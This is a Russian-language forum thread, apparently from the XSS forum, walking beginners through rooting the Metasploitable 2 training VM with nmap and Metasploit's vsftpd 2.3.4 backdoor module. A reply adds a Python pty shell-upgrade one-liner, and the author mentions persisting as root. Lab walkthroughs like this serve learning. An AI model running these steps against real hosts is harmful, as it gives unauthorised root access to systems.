• XSS.stack #1 – первый литературный журнал от юзеров форума

Пентест. Как получить свои первые root права.

Bidiyamakura

RAID-массив
Пользователь
Регистрация
10.12.2024
Сообщения
56
Реакции
5
От автора: Пару пунктов.
1. Я не даю советы, а лишь показывают как делал я.
2. Всё уязвимости находятся в учебной лаборатории "Metasploitab 2".
3. Всё совпадения случайны и выдуманные.
4. Всё сделано в рамках закона,не шалите.
Начнём.

Разведка
Как только мы получили айпишник с виртуалки,прыгает в Kali.

Начинаем сканировать IP командой - nmap[IP]
IMG_20260120_004530_285.jpg

Видим много открытых портов. Будем атаковать 21 порт!

Пишем следующую команду - nmap -sV -p21[IP]
IMG_20260120_005206_369.jpg

Нас интересует то что подчёркнуто а именно эксплойт который мы можем применить.

Реализация
Пишем следующее msfconsole -q
Ждем когда вылезит - msf>
После прописываем search vsftpd(без версии)
IMG_20260120_005842_744.jpg

Выбираем 1(подчеркнул красным) и прописываем путь - use exploit/unix/ftp/vsftpd_234_backdoor

Это как раз тот эксплоит который мы будем использовать.

После чего пишем куда все это отправим - set RHOSTS[IP]
А после чего пишем - exploit
IMG_20260120_010648_751.jpg


Немного ожидаете загрузки и пишите whoami
Если у вас вылезла - root, то могу вас поздравить вы получили root права.
IMG_20260120_010933_027.jpg


Что бы убедиться что действительно мы получили root права то пропишите несколько команд.
id
uname -a
IMG_20260120_011222_388.jpg

Всем пасиба, сем пака)
 
Последнее редактирование:
автор красавчик, хотел бы добавить совет для новичков который сэкономит
кучу нервов
после того как вы все написали и получили сессию вы
окажетесь в мега неудобном терминале (тупорылом) в нём максимально не
удобно работать
поэтому сразу после получения доступа хорошим тоном считается сделать все чуть удобное
самый простой способ на линуксе , если там есть питон на (Metasploitab 2 вроде
есть) python -c 'import pty; pty.spawn("/bin/bash")' оно запускает полноценную оболочку bash после этого можно спокойно работать и не бояться что сессия отвалится
Все я отредактировал. Извинитесь за мои жирные пальцы. Пойду отрублю. А да можно фидбек пж
 
Ну кому как если честно. Мне лично пока удобно работать в таком терминале(если не наступит переломный момент). То что нужно что бы сессия не слетела это верно. Можно еще прописать команд к примеру после перезагрузки наш экспорт будет отвечать нам ну или закрепиться как вечный рут. А да и спасибо что показал как можно использовать код написанный на питоне. Никогда о таком не думал(ну видимо сейчас) ибо в будущем если не будет нужного эксплойта то придётся писать свой
автор красавчик, хотел бы добавить совет для новичков который сэкономит
кучу нервов
после того как вы все написали и получили сессию вы
окажетесь в мега неудобном терминале (тупорылом) в нём максимально не
удобно работать
поэтому сразу после получения доступа хорошим тоном считается сделать все чуть удобное
самый простой способ на линуксе , если там есть питон на (Metasploitab 2 вроде
есть) python -c 'import pty; pty.spawn("/bin/bash")' оно запускает полноценную оболочку bash после этого можно спокойно работать и не бояться что сессия отвалится
 
Слетающая
От автора: Пару пунктов.
1. Я не даю советы, а лишь показывают как делал я.
2. Всё уязвимости находятся в учебной лаборатории "Metasploitab 2".
3. Всё совпадения случайны и выдуманные.
4. Всё сделано в рамках закона,не шалите.
Начнём.

Разведка
Как только мы получили айпишник с виртуалки,прыгает в Kali.

Начинаем сканировать IP командой - nmap[IP]
Посмотреть вложение 112165
Видим много открытых портов. Будем атаковать 21 порт!

Пишем следующую команду - nmap -sV -p21[IP]
Посмотреть вложение 112167

Нас интересует то что подчёркнуто а именно эксплойт который мы можем применить.

Реализация
Пишем следующее msfconsole -q
Ждем когда вылезит - msf>
После прописываем search vsftpd(без версии)
Посмотреть вложение 112168
Выбираем 1(подчеркнул красным) и прописываем путь - use exploit/unix/ftp/vsftpd_234_backdoor

Это как раз тот эксплоит который мы будем использовать.

После чего пишем куда все это отправим - set RHOSTS[IP]
А после чего пишем - exploit
Посмотреть вложение 112169


Немного ожидаете загрузки и пишите whoami
Если у вас вылезла - root, то могу вас поздравить вы получили root права.
Посмотреть вложение 112170

Что бы убедиться что действительно мы получили root права то пропишите несколько команд.
id
uname -a
Посмотреть вложение 112171

Всем пасиба, сем пака)
От автора: Пару пунктов.
1. Я не даю советы, а лишь показывают как делал я.
2. Всё уязвимости находятся в учебной лаборатории "Metasploitab 2".
3. Всё совпадения случайны и выдуманные.
4. Всё сделано в рамках закона,не шалите.
Начнём.

Разведка
Как только мы получили айпишник с виртуалки,прыгает в Kali.

Начинаем сканировать IP командой - nmap[IP]
Посмотреть вложение 112165
Видим много открытых портов. Будем атаковать 21 порт!

Пишем следующую команду - nmap -sV -p21[IP]
Посмотреть вложение 112167

Нас интересует то что подчёркнуто а именно эксплойт который мы можем применить.

Реализация
Пишем следующее msfconsole -q
Ждем когда вылезит - msf>
После прописываем search vsftpd(без версии)
Посмотреть вложение 112168
Выбираем 1(подчеркнул красным) и прописываем путь - use exploit/unix/ftp/vsftpd_234_backdoor

Это как раз тот эксплоит который мы будем использовать.

После чего пишем куда все это отправим - set RHOSTS[IP]
А после чего пишем - exploit
Посмотреть вложение 112169


Немного ожидаете загрузки и пишите whoami
Если у вас вылезла - root, то могу вас поздравить вы получили root права.
Посмотреть вложение 112170

Что бы убедиться что действительно мы получили root права то пропишите несколько команд.
id
uname -a
Посмотреть вложение 112171

Всем пасиба, сем пака)
Следующая тема - https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/145529/
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх